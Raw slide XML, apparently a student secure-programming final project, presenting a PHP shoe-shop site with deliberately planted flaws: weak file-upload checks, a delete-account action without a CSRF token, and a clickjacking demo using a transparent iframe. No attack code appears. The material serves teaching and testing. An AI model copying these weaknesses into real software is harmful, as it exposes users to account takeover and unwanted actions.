            <a:pPr marL="305435" indent="-305435"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-TW" sz="2800">
                <a:latin typeface="Microsoft JhengHei"/>
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>ex. image/jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142329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1258ED3-D7EF-F161-0873-EA6787A7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系統架構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3E88AC-A3F7-9A16-0D05-58DCCF069B97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="1979271"/>
            <a:ext cx="6777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/>
              <a:t>利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400"/>
              <a:t> 撰寫網站</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW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/>
              <a:t>利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400"/>
              <a:t>做為網頁伺服器</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW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/>
              <a:t>利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400"/>
              <a:t> 做為資料庫系統</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW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/>
              <a:t>本專案提供 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400"/>
              <a:t> ，使環境架設方便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08361C-D79D-4D36-2055-35A2C90B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4" y="1886672"/>
            <a:ext cx="2622588" cy="45604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19EB05B-4F51-D7E7-5002-730CB666091E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9020901" y="6447099"/>
            <a:ext cx="212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compose.yml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4E646A-D17D-46F4-BEA3-D93700533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261" y="4632015"/>
            <a:ext cx="4229100" cy="1828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C8136F9-50DC-550C-9792-C5245DB14350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6020813" y="6446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使用語言</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3606324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9A565-2346-77B9-14F4-EBD408C5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我們網站漏洞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D083F4-A0AA-33F7-EC2D-C8CD4BADD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800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>前端</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>後端</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>皆進行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>驗證</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2800"/>
              <a:t>前端驗證副檔名是否為</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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.jpeg </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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、 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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.jpg </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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TW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kumimoji="1"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kumimoji="1" lang="en-US" altLang="zh-TW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endParaRPr kumimoji="1"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TW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後端驗證</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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的格式是否為 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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image/jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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、 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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image/jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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或 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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image/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-TW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endParaRPr kumimoji="1" lang="en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32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4EA8A-2183-01D3-43AB-7F857BA5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Demo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US"/>
              <a:t>影片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5C5290-2C41-75BB-6433-42A247EA7BCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3046971" y="578651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>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://youtu.be/8kQ8YZRyPSw</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="線上媒體 5" descr="安全程式設計-期末專案-任意檔案上傳">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFC7030-01EC-602D-1FAF-813070AF55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64062" y="2360422"/>
            <a:ext cx="6063876" cy="34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5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A9D47-384D-23E1-08E6-ABB30023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CSRF</a:t>
            </a:r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395496A-111E-1039-A8C2-2AF562E1F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522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E97811E-4F4D-9A07-E643-1B312429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原理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CF0554-7BC2-9FCC-9014-6FF3566C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marL="305435" indent="-305435">
              <a:buFont typeface="Wingdings" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>使受害者產生非預期行為，如:修改密碼、轉帳</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="305435" indent="-305435">
              <a:buFont typeface="Wingdings" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>得以部分繞過same origin policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="305435" indent="-305435">
              <a:buFont typeface="Wingdings" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>條件:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="899795" lvl="2" indent="-269875">
              <a:buFont typeface="Wingdings" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>Relevant action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="899795" lvl="2" indent="-269875">
              <a:buFont typeface="Wingdings" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>Cookie-based session handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="899795" lvl="2" indent="-269875">
              <a:buFont typeface="Wingdings" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>No unpredictable request parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="899795" lvl="2" indent="-269875">
              <a:buFont typeface="Wingdings" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400"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19128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E97811E-4F4D-9A07-E643-1B312429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我們網站的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>漏洞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7E8E79-A6AB-C453-0686-29174DC3F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66" y="1933115"/>
            <a:ext cx="9171067" cy="47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21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2CE3D-7D8F-BDF4-242A-EDAF39A7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我們網站的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r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49A264-7B7F-CA68-281F-D75364DB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13" y="2364070"/>
            <a:ext cx="9460374" cy="43690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B695F00-C98C-80EE-FAC2-2A522F358E27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365813" y="1840850"/>
            <a:ext cx="946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800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>無</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> CSRF Token</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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25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F813275-9D7D-846A-C286-145909A7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/>
              <a:t>clickjacking</a:t>
            </a:r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9CCE6A3-C73D-F682-CF81-EBFF59905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941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E97811E-4F4D-9A07-E643-1B312429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甚麼是ClickJACKING?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CA0A2C-276D-F49E-31D8-112A665FE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>
              <a:buFont typeface="Wingdings" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>重疊2個網頁，欺騙使用者</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="305435" indent="-305435">
              <a:buFont typeface="Wingdings" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>透過iframe增加網頁，調整透明度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
              <a:ea typeface="微軟正黑體"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305435" indent="-305435">
              <a:buFont typeface="Wingdings" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>針對有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>CSRF TOKEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t> 的網頁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>進行攻擊</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3325207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E0A2B-B173-623A-6B26-6DFB300E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刪除帳號的頁面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D04574-0484-571A-C379-67F1722E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51" y="2137718"/>
            <a:ext cx="11100898" cy="32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15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489F51-ECA4-CAFF-B913-ABAF356A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刪除帳號網頁的request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D46731-27C9-29C4-3CA6-87F8C1B9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44" y="2066081"/>
            <a:ext cx="8709112" cy="4508340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="框架 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6F99CE3-730D-21EB-B687-989AE2BF5782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1594022" y="5721178"/>
            <a:ext cx="4683210" cy="691979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EF7F504-029E-DABC-C177-D4C82B996C95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6462584" y="5918886"/>
            <a:ext cx="2593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有</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>CSRF Token</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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保護</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3109765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427D3-F2C1-C898-CEA5-69F704C8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系統架構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BE2FA8D-9C6C-6A15-4330-D62545A91DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="1979271"/>
            <a:ext cx="40014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微軟正黑體"/>
              </a:rPr>
              <a:t>主題為 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>嘉大鞋子購物網站</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ea typeface="微軟正黑體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608BFF-6965-204B-A862-C800BCA06A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8508110" y="1979271"/>
            <a:ext cx="30974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>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>index.php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├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js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│   ├── check_stock.js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│   └── check_stock_xml.js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├── login_page.php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├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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│   ├── delete.php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│   ├── edit_passwd.php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│   ├── login.php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│   ├── logout.php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│   ├── stock.php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│   ├── track.php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│   └── upload.php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├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>product.php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├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>product_all.php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├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>product_filter.php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├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>product_search.php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└── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>template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    ├── footer.html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    ├── html_header.html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    ├── nav_header_logined.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    └── nav_header_notlogin.php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22F400-8654-215B-23EB-B97947E89FFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5681719" y="1926334"/>
            <a:ext cx="28263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2060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>├── config.php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├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>css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└── style.css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├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>delete_account.php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├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>edit_passwd_page.php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├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>edit_profile_photo_page.php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├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img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├── NCYU_photo1.jpg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├── big_logo.png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├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>products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│   ├── 1.jpg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│   └── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRP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├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rating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│   ├── rating1.png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│   ├── rating2.png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│   └── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRP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└── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users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    └── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uploads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        ├── default.png</a:t>
            </a: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        ├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uuli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jpg</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRP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        ├── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jafdf.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>│           └── </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cool.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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69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33BF2-4D9A-8C7E-2C3E-1EDAAABF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攻擊者的網頁畫面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>將透明度調為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>50%)</a:t>
            </a:r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ADE9A0-0CD8-5CB4-6151-C555C1B6E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59" y="1850793"/>
            <a:ext cx="9228882" cy="44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20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33BF2-4D9A-8C7E-2C3E-1EDAAABF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/>
              </a:rPr>
              <a:t>攻擊者的網頁畫面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>將透明度調為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="微軟正黑體"/>
              </a:rPr>
              <a:t>0%)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E4C4AD-D011-B0A6-AEC5-6BE3C336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27" y="2018502"/>
            <a:ext cx="9001405" cy="41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57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B8522C-80B9-315F-7C05-C4536EAB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DEMO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>前置作業</a:t>
            </a:r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758C31C7-F89F-9C25-18C0-AA7DB6CDD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929" y="2332975"/>
            <a:ext cx="9524142" cy="3373344"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2694630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EC89C-9C41-0518-4908-4422EDE2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DEMO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>前置作業</a:t>
            </a:r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BFA70712-E704-BB0B-26A1-C30DFAA7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60" y="1872334"/>
            <a:ext cx="7899880" cy="48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88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F94E95D-7A7E-EE29-E95D-4EEA5D79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92" y="1941766"/>
            <a:ext cx="7194616" cy="4659682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0213059C-A474-0DAC-387D-D1A8BD17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DEMO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
